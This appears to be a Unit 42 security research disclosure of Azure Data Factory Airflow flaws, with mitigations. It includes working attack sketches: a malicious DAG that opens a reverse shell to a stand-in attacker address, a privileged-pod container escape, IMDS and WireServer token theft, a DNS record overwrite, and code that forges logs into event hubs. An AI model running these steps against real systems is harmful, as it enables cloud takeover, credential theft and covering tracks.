Executive Summary

Unit 42 researchers have discovered new security vulnerabilities in the Azure Data Factory Apache Airflow integration. Attackers can exploit these flaws by gaining unauthorized write permissions to a directed acyclic graph (DAG) file or using a compromised service principal.

While Microsoft classified these as low-severity vulnerabilities, they still carry significant potential impact for organizations that use Azure Data Factory. The vulnerabilities can provide attackers with shadow admin control over Azure infrastructure, which could lead to data exfiltration, malware deployment and unauthorized data access.

Our research identified multiple vulnerabilities in Azure Data Factory:

  • Misconfigured Kubernetes RBAC in the Airflow cluster
  • Misconfigured secret handling of Azure’s internal Geneva service
  • Weak authentication for Geneva

Exploiting these flaws could allow attackers to gain persistent access as shadow administrators over the entire Airflow Azure Kubernetes Service (AKS) cluster. This could enable malicious activities like data exfiltration, malware deployment or covert operations within the cluster.

Once inside, attackers can also manipulate Azure’s internal Geneva service, which is responsible for managing critical logs and metrics. This could allow attackers to potentially tamper with log data or access other sensitive Azure resources.

Although the cluster we used was isolated from other clusters, the managed Airflow instance used default, unchangeable configurations and attached the cluster admin role to the Airflow runner, which created a security issue. Attackers could exploit this issue to control the Airflow cluster and related infrastructure.

Unit 42 researchers have shared these vulnerabilities with Microsoft. This issue highlights the importance of carefully managing service permissions and of monitoring the operations of critical third-party services to prevent unauthorized access.

In this article, we provide an overview of our findings and outline key mitigation strategies to help safeguard cloud environments from similar threats.

We will also examine Azure's internal Geneva service, which the Airflow instance used and which had write permissions to specific shared storage accounts. Figure 1 illustrates the Azure Data Factory Airflow infrastructure and the attack process.

Flowchart demonstrating a cybersecurity attack involving four steps: Step 1 shows pushing a malicious Dag; Step 2 depicts privilege escalation in a Kubernetes system; Step 3 involves data access in a PostgreSQL Server; and Step 4 outlines footprint masquerading in an Azure Tenant scenario.
Figure 1. Azure Data Factory and Airflow cluster architecture overview.

Palo Alto Networks customers are better protected from the threats discussed in this article through the products listed in the Conclusion of this article.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics: Microsoft Azure, Containers

Background: Azure Data Factory and Apache Airflow

Before we delve into the intricacies of our research on Azure Data Factory and Apache Airflow, it's essential to be aware of the following fundamental concepts.

  • Data Factory service
    • Data Factory is an Azure-based data integration service that enables users to manage data pipelines when moving data between different sources.
  • Airflow service
    • Apache Airflow is an open-source platform that facilitates the scheduling and orchestration of complex workflows. This enables users to manage and schedule tasks as Python-coded DAGs.
  • Airflow DAG files
    • DAG files define the workflow structure as Python code. These files specify the sequence in which tasks should be executed, dependencies between tasks and scheduling rules.
  • Azure Airflow integration with Data Factory
    • Azure Data Factory offers a managed Apache Airflow integration that deploys Airflow environments on Azure infrastructure and imports DAG files from connected storage accounts or Git repositories.

Gaining Initial Access to the Azure Data Factory Airflow Integration

Here's a high-level overview of the flow of an initial attack scenario:

  • Craft a DAG file that opens a reverse shell to a remote server and runs automatically when imported.
  • Upload the DAG file to a private GitHub repository connected to the Airflow cluster.

Airflow imports and runs the DAG file automatically from the connected Git repository, opening a reverse shell on an Airflow worker. At this point, we gained cluster admin privileges due to a Kubernetes service account that was attached to an Airflow worker.

There are two ways for attackers to gain access to and tamper with DAG files:

  • Gaining write permissions to the storage account containing DAG files by leveraging either a principal account with write permissions or a shared access signature (SAS) token for the files. SAS tokens temporarily grant limited access to DAG files. Once a DAG file is tampered with, it lies dormant until the DAG files are imported by the victim.
  • Gaining access to a Git repository through leaked credentials or a misconfigured repository. Once this access is obtained, the attacker creates a malicious DAG file or modifies an existing one, and the directory containing the malicious DAG file is imported automatically.

We chose leaked Git repository credentials as our attack scenario. In this case, once the attacker modifies a DAG file in the compromised repository, Airflow executes it and the attacker gets a reverse shell.

For our research, we crafted a malicious DAG file (shown in Figure 2).

Screenshot of code including import statements and a DAG definition with a bash operator.
Figure 2. Reverse shell DAG code.

The file ran automatically upon import (as shown in Figure 3) using the schedule_interval and start_date parameters. The file’s purpose was to run a task that initiates a reverse shell to an external server.
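The code in Figure 2 is not reproduced here. As an illustration only, a DAG of this kind could look like the following minimal sketch, in which the DAG name, task name and attacker address are hypothetical placeholders:

  # Minimal sketch of a malicious DAG; hypothetical names and address, not the code from Figure 2.
  from datetime import datetime

  from airflow import DAG
  from airflow.operators.bash import BashOperator

  with DAG(
      dag_id="data_sync",                  # innocuous-looking name
      start_date=datetime(2024, 1, 1),     # a date in the past ...
      schedule_interval="@once",           # ... so the DAG is scheduled as soon as it is imported
      catchup=True,
  ) as dag:
      # Task that opens a reverse shell to an attacker-controlled host.
      BashOperator(
          task_id="sync_task",
          bash_command="bash -c 'bash -i >& /dev/tcp/203.0.113.10/4444 0>&1'",
      )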

Screenshot of the Apache Airflow web interface displaying a list of DAGs (Directed Acyclic Graphs) with various statuses indicated by colored circles: green for success and red for failure. The screen shows options for triggering DAGs, refreshing the view, and filtering tasks.
Figure 3. Airflow user interface (UI) showing current DAG files with details.

Upon running the DAG file, we received the reverse shell connection and could communicate with the instance. The shell we received was running under the context of the Airflow user in a Kubernetes pod shown in Figure 4, which had minimal permissions.

A computer screen displaying a command prompt where the command "whoami" has been typed and the response underneath is "airflow". The text is in white with a black background.
Figure 4. Whoami shows a non-root user.

However, the pod had public internet access as shown below in Figure 5.

Screenshot of curl output displaying various metrics such as DNS server IP address, download and upload speeds, total data spent and current speed.
Figure 5. Curl shows that we have public internet access.

While inspecting the pod, we discovered a secret, which was a service account token mounted into the pod file system. Due to the pod's network connectivity, this new access allowed us to download Kubectl (Kubernetes’ command-line tool) and to test our permissions as shown in Figure 6.
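For illustration, the same permission check can be made directly against the Kubernetes API with the mounted token. The following is a minimal sketch that is roughly equivalent to the kubectl auth can-i --list output in Figure 6, assuming the standard in-cluster service account paths:

  # Minimal sketch: ask the Kubernetes API which rules the mounted service account token grants.
  import requests

  SA_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"
  token = open(f"{SA_DIR}/token").read()

  resp = requests.post(
      "https://kubernetes.default.svc/apis/authorization.k8s.io/v1/selfsubjectrulesreviews",
      headers={"Authorization": f"Bearer {token}"},
      json={
          "apiVersion": "authorization.k8s.io/v1",
          "kind": "SelfSubjectRulesReview",
          "spec": {"namespace": "default"},
      },
      verify=f"{SA_DIR}/ca.crt",
  )
  for rule in resp.json()["status"]["resourceRules"]:
      print(rule)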

Terminal screen showing a command `kubectl auth can-i --list` with the output displaying permissions for Resources and Non-Resource URLs in Kubernetes.
Figure 6. Worker pod shows Kubernetes cluster admin privileges.

We saw that the service account used by the pod had cluster admin permissions, giving us full control over the entire cluster. These permissions included creating pods, accessing Kubernetes secrets (shown in Figure 8) and creating new users. This allowed us to enumerate the cluster environments (shown in Figures 7 and 8) and to gain more insight on how Airflow was deployed.

Screenshot of a computer terminal displaying the output of the Kubernetes command "kubectl get pods -A", listing several pods and their names.
Figure 7. Pods inside the cluster.
Text-based screenshot depicting the output of a command-line operation to list Kubernetes secrets, showing columns for namespace, name, type, data, and age, with various entries under each heading.
Figure 8. Kubernetes cluster secrets relevant to Azure and Airflow.

We found secrets related to Airflow, such as the PostgreSQL backend password and TLS certificates to the Airflow domain. Additionally, we observed an API key to an exposed storage account containing DAG files, shown in Figure 9.

A terminal screen showing the output of the command `kubectl get secret`, displaying an output snippet including API version and data keys for Azure storage account and a web server secret.
Figure 9. Showing secrets that are stored in the cluster.

Microsoft’s response to the underlying security issue that we reported was to underscore that “the above is isolated to the researcher's cluster alone.”

Although the cluster is isolated from other clusters, the managed Airflow instance used default, unchangeable configurations and attached the cluster admin role to the Airflow runner, which created a security issue. Attackers could exploit this issue to control the Airflow cluster and related infrastructure.

When enumerating the cluster resources, we understood that this was a single-tenant deployment and that the cluster was available only to us. However, to exhaust our options, we further enumerated the cluster and primarily found Airflow pods, such as the server backend and web UI, as well as some pods labeled geneva-services. We will delve into the meaning of this label in a later section (Exploiting Geneva – Azure Internal Service) to explore the potential impact.

Container Escape: Gaining Access to the AKS Host

Once we had cluster admin permissions, we could escalate and take over the cluster by deploying a privileged pod and breaking out onto the underlying node, as shown in Figure 10. The privileged pod shared host resources and mounted the host's root file system as a volume.
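In practice we performed this step with kubectl. The following is a minimal sketch of the privileged pod pattern, in which the pod name, image and namespace are placeholders rather than our exact manifest:

  # Minimal sketch: create a privileged pod that mounts the node's root file system.
  import requests

  SA_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"
  token = open(f"{SA_DIR}/token").read()

  pod = {
      "apiVersion": "v1",
      "kind": "Pod",
      "metadata": {"name": "priv-test"},
      "spec": {
          "hostPID": True,                                # share the node's process namespace
          "containers": [{
              "name": "priv",
              "image": "ubuntu",
              "command": ["sleep", "infinity"],
              "securityContext": {"privileged": True},
              "volumeMounts": [{"name": "hostfs", "mountPath": "/host"}],
          }],
          "volumes": [{"name": "hostfs", "hostPath": {"path": "/"}}],   # node root file system
      },
  }

  requests.post(
      "https://kubernetes.default.svc/api/v1/namespaces/default/pods",
      headers={"Authorization": f"Bearer {token}"},
      json=pod,
      verify=f"{SA_DIR}/ca.crt",
  )
  # Once the pod is running, `kubectl exec -it priv-test -- chroot /host` yields a root shell on the node.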

Command line interface displaying Kubernetes commands for a privileged pod test and entering a new root directory.
Figure 10. Accessing the host disk with a privileged pod.

At this point, we gained access to the host virtual machine (VM) with root access.

From the uname command output (shown in Figure 11), we understood that we were running in the scope of a VM scale set (Azure VM scaling solution), and that the Airflow cluster was running on top of that.

A command line interface displaying a Linux kernel version, the text indicates it's running on Microsoft Azure, with specific version and build details.
Figure 11. Uname command revealed information about a host.

Figure 12 depicts the container breakout flow.

Flowchart depicting a cybersecurity attack using containers and pods. From left to right: "Malicious DAG" symbol leads to "Run DAG," which connects to "Create Pod." This flows into a symbol labeled "Privileged Pod," then to "Chroot Host," and culminates with "Host Takeover." The symbols are connected by arrows indicating sequence.
Figure 12. Chain of events leading to host takeover.

Full Cluster Control Impact

Having a high-privileged service account connected to the Airflow runner pod enables control of the node itself and presents attackers with multiple opportunities to extend their actions. Here are two examples of such opportunities:

  • Shadow workloads through shadow administrator access: An attacker could create another service account role with cluster admin privileges. The account could have full access to create pods and other resources inside the cluster that could cause damage, such as creating pods that serve malware or cryptomining without the victims’ awareness. Figure 13 illustrates such a scenario.
Diagram of an Airflow AKS Cluster showing various nodes. The nodes are labeled as Cluster Admin, Airflow-1, Airflow-2, Airflow-3, Attacker Cluster Admin, Malicious Workload, and Crypto Miner. Each node type is represented in either blue or red, with distinct icons for administrative and operational roles.
Figure 13. An attacker can covertly take over the cluster and steal data sources from Airflow.
  • Data exfiltration: The attacker could gain persistence in the cluster through workload creation, actively leaking data that is connected to the Airflow environment over time as shown in Figure 14. Due to the level of access, the attacker could obtain credential information related to current and future data sources connected to the Airflow environment, such as storage accounts and SQL servers.

    Diagram showing an Airflow AKS Cluster with components: Cluster Admin, Cluster Secrets, Airflow-Backend, and their connection to Data Sources, which are being hijacked by an attacker cluster admin.
    Figure 14. An attacker can hijack the cluster for malicious uses.

Discovering Assets in the New Azure Environment

From Root to Azure Identity

After getting root access on the host, we were able to start with the discovery process of our new environment. First, we used the Instance Metadata Service (IMDS) endpoint to grab the machine authentication token.

The IMDS endpoint provides information about the currently running VM instance. It can be used to manage and configure VMs, including obtaining an authentication token for managed identities assigned to the VM. IMDS is exposed via an endpoint that is accessible only from the machine itself.
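Figure 18 later in this article shows the actual call we used. As a minimal sketch of the same pattern (the IMDS address and API version are standard; the client ID is a hypothetical placeholder), requesting a management-plane token for a user-assigned managed identity looks like this:

  # Minimal sketch: request an Azure management token from IMDS for a user-assigned managed identity.
  import requests

  resp = requests.get(
      "http://169.254.169.254/metadata/identity/oauth2/token",
      params={
          "api-version": "2018-02-01",
          "resource": "https://management.azure.com/",
          "client_id": "<IdentityClientId of the target managed identity>",  # placeholder
      },
      headers={"Metadata": "true"},
  )
  access_token = resp.json()["access_token"]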

WireServer

Azure's WireServer is another endpoint that can be accessed from within any Azure VM and that, in some scenarios, exposes sensitive metadata and configuration information. WireServer facilitates communication between Azure VMs and the Azure environment. It does so by enabling the delivery of configuration information and management tasks from Azure to the VMs, ensuring that they operate in accordance with the user's specifications and Azure's infrastructure requirements.

The WireServer is accessed via an HTTP endpoint, which uses the IP address 168.63.129[.]16. This endpoint can be queried to retrieve information about VM extensions and sensitive data. By using the IMDS and WireServer endpoints, we discovered that two managed identities were connected to the Virtual Machine Scale Set (VMSS), a group of load-balanced VMs.
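The exact queries we ran are shown in Figures 15 and 17. As a minimal sketch, assuming the commonly used agent protocol version header, a WireServer goal-state query looks like this:

  # Minimal sketch: query the WireServer goal state, which points to further
  # configuration URLs such as the extensionsConfig endpoint.
  import requests

  resp = requests.get(
      "http://168.63.129.16/machine/?comp=goalstate",
      headers={"x-ms-version": "2012-11-30"},
  )
  print(resp.text)   # XML describing the VM's goal state and config URLs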

We used the WireServer to obtain further information regarding the instance.

The following activities formed our high-level workflow:

  • Querying the WireServer endpoint to discover managed identities
  • Querying IMDS to get an access token for each identity
  • Enumerating the Azure environment
  • Querying the Microsoft.Authorization/roleAssignments API call to discover custom roles

First, we queried the WireServer endpoint to see VM extension information and general information with the command shown in Figure 15.

Terminal screenshot displaying a curl command with user-agent and version specified in the command.
Figure 15. WireServer API call.

From this query, we got the following output shown in Figure 16. The output shows the virtual machine state, different configurations and information that can be gathered about the machine.

Screenshot of a computer screen displaying code. The text includes elements like machine details, host information, and IP addresses. Some of the information has been redacted.
Figure 16. WireServer API output.

After that, we did the same for the extensions endpoint with the following command:

  • hXXp://168.63.129[.]16:80/machine/<REDACTED>-6f7490f0cc7b/<REDACTED>-ab78-81795f77ad10._aks-agentpool-30850510-vmss_2?comp=config;type=extensionsConfig;incarnation=2

We received the response shown in Figure 17.

Screenshot of code with highlighted sections indicating the "ClientId" and "TenantID" values. Two lines are highlighted in green and two in red.
Figure 17. WireServer VM identity information.

We can see two user-assigned managed identities that are created for the cluster:

  • httpapplicationrouting-<CLIENT TENANTID>
  • <CLIENT TENANTID>-agentpool

For each identity, there is an attached attribute IdentityClientId that is used when querying the IMDS endpoint to obtain its relevant access token. Figure 18 depicts how to query the IMDS endpoint for a specific user-assigned managed identity token.

Screenshot of a command line interface using a curl request to the Azure API, including parameters for identity, client ID, resource URL, and metadata settings.
Figure 18. IMDS API call to retrieve specific managed identity credentials.

From our query, we received the token shown in Figure 19.

Code snippet displaying an access token response from Microsoft Azure, including keys for client ID, expiration times, and token type.
Figure 19. Azure access token for relevant identity.

The Discovery Process in the New Azure Environment

At this point, we started analyzing the Azure subscription we were running on by using the new identity tokens. We found some resources we could access, and by enumerating them in the environment, we could better understand our options.

A dedicated resource group for each Airflow deployment is created when the AKS cluster is deployed. A special HTTP application routing add-on for Kubernetes is added that can create records in the DNS zone resource and enable network routing to the AKS instance. This add-on is slated for retirement and is not suitable for production use, as described in Microsoft's documentation on the AKS HTTP application routing add-on.

The add-on creates the HTTPApplicationRouting identity with a Reader role (shown in Figure 20) over the resource group and a Contributor role over the DNS zone, which enabled us to modify the DNS service attached to the cluster.

Diagram showing a Microsoft Azure internal subscription, including an HTTPApplicationRouting Managed Zone connected to a Unique Client Resource Group and a VM scale set with several virtual machines labeled VM1 through VMN within an AKS cluster environment. The layout includes icons representing network structures and text annotations that explain the roles and components of the Azure services.
Figure 20. Cloud infrastructure topology of Airflow deployment.

At this point, several Azure-managed resources were accessible to us. Initially, this was just the storage account where the DAG files were imported and the DNS zone to which we had contributor access and could modify records.

Additionally, custom role definitions inside Azure’s tenant with the keyword Geneva (shown in Figure 21) caught our eye. This was notable because the cluster had pods labeled geneva-service-xxxx (shown previously in Figure 7).

Screenshot of a configuration file for Azure role-based access control, including definitions for role permissions and descriptions.
Figure 21. Custom roles regarding Geneva, each with different permissions.

The role definitions prompted questions about the nature of these pods, as well as the purpose of Geneva and its application.

When we inspected the roles' permissions, we saw what capabilities Geneva could have. We found that it was able to manage multiple types of Azure resources, such as event hubs, subscription management and storage.

Permissions such as Microsoft.Storage/storageAccounts/listKeys/action or Microsoft.Resources/subscriptions/read and Microsoft.EventHub/register/action (which is used to register an EventHub provider) show Geneva’s potential capabilities.
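For illustration, the custom role definitions could be enumerated with a stolen access token through the Azure management REST API. This is a minimal sketch with hypothetical placeholders, not the exact query we ran:

  # Minimal sketch: list custom role definitions visible to the stolen identity.
  import requests

  SUBSCRIPTION_ID = "<subscription-id>"                    # placeholders
  TOKEN = "<access token obtained from IMDS>"

  resp = requests.get(
      f"https://management.azure.com/subscriptions/{SUBSCRIPTION_ID}"
      "/providers/Microsoft.Authorization/roleDefinitions",
      params={"$filter": "type eq 'CustomRole'", "api-version": "2022-04-01"},
      headers={"Authorization": f"Bearer {TOKEN}"},
  )
  for role in resp.json()["value"]:
      props = role["properties"]
      print(props["roleName"], props["permissions"][0]["actions"])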

These high-privileged custom roles led us to inspect the pods in our cluster and their runtime behavior.

Disclosing internal role definition information and enumerating the cluster’s cloud environment could help attackers better understand what they can and can’t do. Furthermore, attackers could use the access tokens to modify the DNS zone resource and access storage accounts related to Airflow.
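As a hypothetical illustration of the DNS manipulation described above, a token for the HTTPApplicationRouting identity (which holds Contributor on the DNS zone) could overwrite a record set through the Azure DNS REST API; all names below are placeholders:

  # Minimal sketch: overwrite an A record in the DNS zone attached to the Airflow deployment.
  import requests

  SUBSCRIPTION_ID = "<subscription-id>"                    # placeholders
  RESOURCE_GROUP = "<airflow-resource-group>"
  DNS_ZONE = "<dns-zone-name>"
  TOKEN = "<access token for the HTTPApplicationRouting identity>"

  url = (
      f"https://management.azure.com/subscriptions/{SUBSCRIPTION_ID}"
      f"/resourceGroups/{RESOURCE_GROUP}/providers/Microsoft.Network"
      f"/dnsZones/{DNS_ZONE}/A/airflow"
  )
  record = {"properties": {"TTL": 60, "ARecords": [{"ipv4Address": "203.0.113.10"}]}}

  resp = requests.put(
      url,
      params={"api-version": "2018-05-01"},
      headers={"Authorization": f"Bearer {TOKEN}"},
      json=record,
  )
  print(resp.status_code)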

Exploiting Geneva – Azure Internal Service

Upon encountering Azure resources and pods regarding Geneva in our cluster, we assumed Geneva was related to gathering analytics data. We wanted to explore this to better understand this internal Azure system. Figure 22 shows which pods were in the AKS cluster.

Text displaying three lines of code, each beginning with "geneva-services" followed by a unique suffix: cw98t, dz6jc, pjd9h.
Figure 22. Geneva pods in the Airflow cluster.

The Geneva service is an internal Azure service that monitors and gathers analytical data from Microsoft's infrastructure at scale. The impact of any security misconfiguration in this service can be detrimental.

There isn’t much information online about Geneva, other than on a small number of Microsoft forums for in-house developers. As such, we started analyzing the runtime behavior of the pods to gain a better understanding of the service.

The following activities formed our high-level workflow:

  • Inspecting Geneva pods and the attached secrets in our cluster
  • Performing a runtime and static analysis of pods, as well as the certificate and key in the secrets
  • Discovering internal API endpoints used by pods
  • Leveraging the API endpoints to disclose multiple Azure resources
  • Exploiting read/write privileges on multi-tenant shared resources

Geneva Service Pod Inspection

Inspecting the pods revealed that they used the secrets azsecpack-auth, mdm-auth and mdsm-auth (shown in Figure 23).

Text-based screenshot depicting the output of a command-line operation to list Kubernetes secrets, showing columns for namespace, name, type, data, and age, with various entries under each heading.
Figure 23. Secret list inside the cluster. Note the auth secrets.

We saw processes inside the pod that ran the Azure mdsd monitoring agent (shown in Figure 24).

A screenshot of a terminal with a process list, displayed using the "ps -ef" command. The list includes columns for UID, PID, PPID, start time, and more.
Figure 24. Geneva service pods running processes.

At this point, we assumed that the mdsd agent collects metrics such as cluster health, pod status and current live processes. It then sends them to the Geneva service.

Moreover, a binary related to mdsd that we found used a certificate and a key for authentication. Figure 25 shows the different flags the binary used.

A screenshot of a command-line interface displaying a list of allowed arguments for a utility, which includes commands related to help, monitoring environment, namespace, identity type, and configuration among others, with specific examples provided at the bottom.
Figure 25. Non-standard mdsd utility binary in the pod that is used for debugging.

The azsecpack-auth, mdm-auth and mdsm-auth secrets contained a certificate and a private key shown in Figure 26.

A screenshot displaying commands and outputs on a computer terminal, including interactions with Kubernetes showing secret management commands. The visible text features keys and metadata.
Figure 26. Certificate that was stored as a secret in the Airflow cluster.

Using the OpenSSL command-line interface (CLI), we inspected the certificate with the following command:

  • openssl x509 -in certificate.crt -text -noout

Figure 27 shows the details we received.

Screenshot of a digital certificate displaying various encryption and authentication details including serial number, issuer, validity dates, and other security algorithms. Some information is redacted.
Figure 27. OpenSSL information about certificate identity.

The decoded certificate in Figure 27 above shows that the subject CN (which is the domain name protected by the certificate) was gcs.svc.datafactory.azure.com. When we inspected the same secrets in other Airflow deployments, we saw the same subject CN used across all deployments.

In addition, all Airflow deployments use the same certificate to authenticate to the Geneva service. There is no separation between different Airflow deployments.

Discovering Internal API Endpoints

At this point, we wanted to better understand Geneva's mechanism through the mdsd binary. We reverse engineered the binaries to reveal multiple API endpoints that mdsd monitoring agents used to communicate with Geneva. Figures 28 and 29 show snippets from the reverse engineering process.

Screenshot of a computer screen displaying various lines of coding and configuration paths related to a monitoring account, which are highlighted in red boxes.
Figure 28. API endpoints in binary strings.
A screenshot of code from a computer program displayed in color-coded text on a black background. One line in the upper section is highlighted in red.
Figure 29. REST API URL construction inside binary.

Through the reverse engineering process, we were able to reconstruct API calls to Geneva. Using the certificate and key that we found earlier, we could authenticate to Geneva and call the API endpoints we had found.

The API endpoints we found disclosed more Azure resources. Some gave us write access to storage accounts, event hubs and other internal Azure systems.
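For illustration only, calling such an endpoint with the extracted certificate and key amounts to ordinary client-certificate (mutual TLS) authentication. The host and path below are hypothetical placeholders, not the actual endpoints we recovered from the binary:

  # Minimal sketch: authenticate to a Geneva-style endpoint with the certificate
  # and private key extracted from the cluster secrets (hypothetical URL).
  import requests

  resp = requests.get(
      "https://<geneva-endpoint>/api/<redacted-path>",
      cert=("certificate.crt", "private.key"),   # client certificate authentication
  )
  print(resp.status_code, resp.text[:200])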

Figure 30 illustrates the access level we achieved.

Illustration of data flow involving the Geneva service in an Airflow cluster, which interacts with Databricks Hub and Storage Accounts through read and write operations using HTTP REST.
Figure 30. Geneva service in our cluster with access to different Azure resources.

Geneva's Aftermath: The Impact on Azure’s Ecosystem

Internal Data Assets Exposed

Using the above endpoints and keys, we found multiple SAS tokens for data assets. Figures 31 and 32 show examples of the tokens we found.

Screenshot of code with highlighted sections showing resource names as "BlobService" and "TableService." Some information has been redacted.
Figure 31. Storage account keys found.
Screenshot of a code snippet with some redacted text, mentioning URLs related to 'onedrive.windows.net', and showing key-value pairs for data fields including 'Session' and 'IPAddress'.
Figure 32. Event hub keys found.

We also found that we were not restricted from writing to the datastores.
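As a minimal sketch of such a write test, assuming the azure-storage-blob SDK and a hypothetical SAS URL standing in for one of the exposed tokens:

  # Minimal sketch: confirm write access to a storage account using an exposed SAS token.
  from azure.storage.blob import BlobClient

  blob = BlobClient.from_blob_url(
      "https://<account>.blob.core.windows.net/<container>/poc.txt?<sas-token>"   # placeholder
  )
  blob.upload_blob(b"write test", overwrite=True)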

Another notable API call we found disclosed entities such as users or machines that had access to Geneva (shown in Figure 33).

A screenshot displaying code related to Microsoft Cloud permissions configuration. The repeated line of text includes references to identity, metrics, and user permissions within the Microsoft ecosystem. Some info is redacted.
Figure 33. Information disclosed by an API regarding identities that use Geneva.

Log Manipulation Attack Scenario

Using the exposed SAS tokens for the event hubs, we could write arbitrary information to them. This means a sophisticated attacker could tamper with a vulnerable Airflow environment.

For example, an attacker could create new pods and new service accounts. They could also apply changes to the cluster nodes themselves and then send fake logs to Geneva without raising an alarm.

We used the code shown in Figure 34 to demonstrate this.

A screenshot of code in a text editor. Specific Azure services are visible. The code includes function definitions, event handling, and print statements, all written on a dark themed background.
Figure 34. Proof of concept code that demonstrated the impact of generating and sending crafted logs to Azure’s central log service.
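The code in Figure 34 is not reproduced here. The following is a minimal sketch of the general pattern, assuming the azure-eventhub SDK and a hypothetical connection string standing in for one of the exposed event hub credentials:

  # Minimal sketch: send a crafted log record to an event hub using an exposed SAS credential.
  import json
  from azure.eventhub import EventData, EventHubProducerClient

  CONN_STR = (
      "Endpoint=sb://<namespace>.servicebus.windows.net/;"
      "SharedAccessKeyName=<name>;SharedAccessKey=<key>;EntityPath=<hub>"   # placeholder
  )

  fake_log = {"level": "INFO", "message": "cluster healthy", "podStatus": "Running"}

  producer = EventHubProducerClient.from_connection_string(CONN_STR)
  with producer:
      batch = producer.create_batch()
      batch.add(EventData(json.dumps(fake_log)))   # crafted log entry
      producer.send_batch(batch)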

Conclusion

Our research identified multiple vulnerabilities in Azure Data Factory:

  • Misconfigured Kubernetes RBAC in the Airflow cluster
  • Misconfigured secret handling of the Geneva service
  • Weak authentication for Geneva

These vulnerabilities could enable attackers to escape from their pods, gain unauthorized administrative control over clusters and access Azure's internal services (Geneva). Attackers could exploit the vulnerabilities through compromised service principals or unauthorized modifications to DAG files. This could enable attackers to become shadow administrators and to gain full control over managed Airflow deployments within a single tenant.

We would like to thank Microsoft MSRC for helping to resolve these issues.

Adversaries have moved beyond basic tactics to more sophisticated service-specific attacks. Therefore, it is essential to adopt a comprehensive protection strategy that goes beyond simply safeguarding the cluster's perimeter.

This strategy should include:

  • Securing permissions and configurations within the environment itself, and using policy and audit engines to help detect and prevent future incidents (both within the cluster and in the cloud)
  • Safeguarding sensitive data assets that interact with different services in the cloud, and understanding which data is being processed by which data service

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • Advanced WildFire cloud-delivered malware analysis service accurately identifies known samples as malicious
  • Next-Generation Firewall with the Advanced Threat Prevention security subscription can help block the attacks with best practices via the following Threat Prevention signature: 54790
  • Cortex XDR and XSIAM offer protections relevant to the threats described, such as through the reverse shell module for Behavioral Threat Protection.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.
